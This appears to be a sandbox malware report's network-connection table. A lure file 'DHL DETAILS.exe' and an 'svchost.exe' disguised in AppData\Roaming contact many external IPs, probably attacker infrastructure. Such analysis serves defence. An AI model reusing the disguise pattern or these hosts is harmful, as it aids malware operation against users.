                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7615192.168.2.56464451.161.131.846305543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7616192.168.2.564614183.88.46.37808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7617192.168.2.56483975.119.145.1542508456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7618192.168.2.55464245.11.95.16560146352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7619192.168.2.560449162.214.165.2038043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7620192.168.2.557082125.227.225.157338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7621192.168.2.564795105.112.140.218808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7622192.168.2.561064203.222.24.368043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7623192.168.2.558163192.111.137.35414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7624192.168.2.55674346.229.253.67312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7625192.168.2.561202103.60.138.2415343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7626192.168.2.564978164.92.86.1135409356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7627192.168.2.56528951.222.241.1574628656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7628192.168.2.56488651.158.108.1651637943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7629192.168.2.557077138.0.143.128808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7630192.168.2.56121243.155.170.351567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7631192.168.2.561217185.38.111.1808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7632192.168.2.561298104.22.37.2368043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7633192.168.2.56124394.130.94.458043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7634192.168.2.565014168.205.100.36808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7635192.168.2.561262138.2.73.157108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7636192.168.2.56122143.231.22.2288043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7637192.168.2.56128745.11.95.165600243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7638192.168.2.560525206.81.14.1683196643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7639192.168.2.560025198.12.255.1933221643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7640192.168.2.55999692.204.134.385112343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7641192.168.2.561355104.19.217.2198043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7642192.168.2.561363104.27.66.318043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7643192.168.2.561364172.67.182.388043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7644192.168.2.561410104.20.205.1918043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7645192.168.2.561417172.64.86.2178043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7646192.168.2.560272203.57.51.538043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7647192.168.2.557950159.223.71.715924343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7648192.168.2.561214180.250.159.49415343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7649192.168.2.56540145.11.95.165501843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7650192.168.2.55793098.181.137.80414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7651192.168.2.561332161.97.163.523209243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7652192.168.2.561350148.72.215.794862343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7653192.168.2.56138062.33.207.2028043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7654192.168.2.558170200.108.190.99980043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7655192.168.2.56134151.161.131.845861243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7656192.168.2.560415172.214.74.105312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7657192.168.2.560704200.6.175.105934143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7658192.168.2.55891351.77.222.4811843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7659192.168.2.558644152.67.10.190810043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7660192.168.2.560395185.51.92.1085132743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7661192.168.2.56144745.61.188.1344449943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7662192.168.2.561458162.240.231.2113554143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7663192.168.2.561469172.67.182.1538043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7664192.168.2.561478104.19.235.108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7665192.168.2.56157545.12.31.1048043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7666192.168.2.561699104.23.100.738056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7667192.168.2.56141945.5.118.4399943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7668192.168.2.561028184.178.172.26414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7669192.168.2.560611202.136.89.227808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7670192.168.2.561825162.241.6.974562956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7671192.168.2.56149162.40.157.2313265043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7672192.168.2.559888148.72.23.563939643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7673192.168.2.562446199.102.105.242414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7674192.168.2.562084199.58.184.97414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7675192.168.2.562640104.27.26.298056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7676192.168.2.562462192.252.208.701428256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7677192.168.2.56255898.178.72.211091956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7678192.168.2.562668172.93.213.1778056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7679192.168.2.562251120.37.121.209909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7680192.168.2.561229185.217.136.67133743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7681192.168.2.5626805.252.23.220108156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7682192.168.2.56283143.152.192.21744356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7683192.168.2.56180654.39.50.68821656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7684192.168.2.562702106.105.218.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7685192.168.2.56302743.152.192.21744356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7686192.168.2.56304043.152.192.21744356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7687192.168.2.56305743.152.192.21744356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7688192.168.2.56200645.117.179.1792783656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7689192.168.2.56139680.249.112.1628043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7690192.168.2.562196162.214.165.64262456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7691192.168.2.562864203.222.24.368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7692192.168.2.5628451.15.62.12567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7693192.168.2.562868114.156.77.107808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7694192.168.2.563227172.67.181.378056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7695192.168.2.562903200.10.73.210567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7696192.168.2.563164172.93.213.1778056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7697192.168.2.56290143.155.170.351567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7698192.168.2.562287162.241.46.404144256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7699192.168.2.563574199.102.105.242414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7700192.168.2.56347738.162.8.226312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7701192.168.2.563217181.204.184.12299956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7702192.168.2.563608191.102.160.157312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7703192.168.2.563131138.2.73.157108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7704192.168.2.56351537.235.53.208678956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7705192.168.2.563715199.58.184.97414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7706192.168.2.56382898.178.72.211091956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7707192.168.2.56357645.11.95.165600256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7708192.168.2.5636135.252.23.220108156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7709192.168.2.562588132.148.244.303476056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7710192.168.2.56376561.178.152.31730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7711192.168.2.564225199.102.105.242414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7712192.168.2.564127172.93.213.1778056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7713192.168.2.561805107.148.201.1578056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7714192.168.2.56288464.227.108.253190856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7715192.168.2.564004106.105.218.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7716192.168.2.564453104.19.124.1128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7717192.168.2.564535172.64.152.988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7718192.168.2.564254200.10.73.210567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7719192.168.2.562458194.233.78.1424111956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7720192.168.2.56427143.155.170.351567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7721192.168.2.56266954.222.197.147808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7722192.168.2.564448199.58.184.97414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7723192.168.2.564447203.222.24.368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7724192.168.2.564696181.78.11.21899956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7725192.168.2.562258223.112.53.2102543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7726192.168.2.565101104.24.15.1588056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7727192.168.2.56290698.181.137.80414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7728192.168.2.5648665.252.23.220108143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7729192.168.2.56504737.235.53.208678943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7730192.168.2.562842195.114.209.508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7731192.168.2.551369162.214.163.13774846352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7732192.168.2.56524161.178.152.31730243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7733192.168.2.551257161.35.83.25131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7734192.168.2.551465220.118.191.23831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7735192.168.2.552514162.243.55.12509416352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7736192.168.2.565417162.159.242.1048056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7737192.168.2.56269174.119.144.60414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7738192.168.2.565305200.10.73.210567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7739192.168.2.56303442.49.148.167900156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7740192.168.2.549202219.71.216.788056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7741192.168.2.549597104.20.34.1008043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7742192.168.2.565308106.105.218.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7743192.168.2.549428203.222.24.368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7744192.168.2.554668104.19.5.247806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7745192.168.2.5510241.15.62.1256786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7746192.168.2.555230166.62.85.184219466352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7747192.168.2.556100104.20.235.1798043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7748192.168.2.557092199.102.106.94414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7749192.168.2.558771104.200.135.46414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7750192.168.2.55128337.235.53.20867896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7751192.168.2.559643104.16.107.1428043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7752192.168.2.5642285.252.23.249108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7753192.168.2.560989104.27.12.228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7754192.168.2.55542254.36.122.164458743220C:\Users\user\AppData\Roaming\svchost.exe
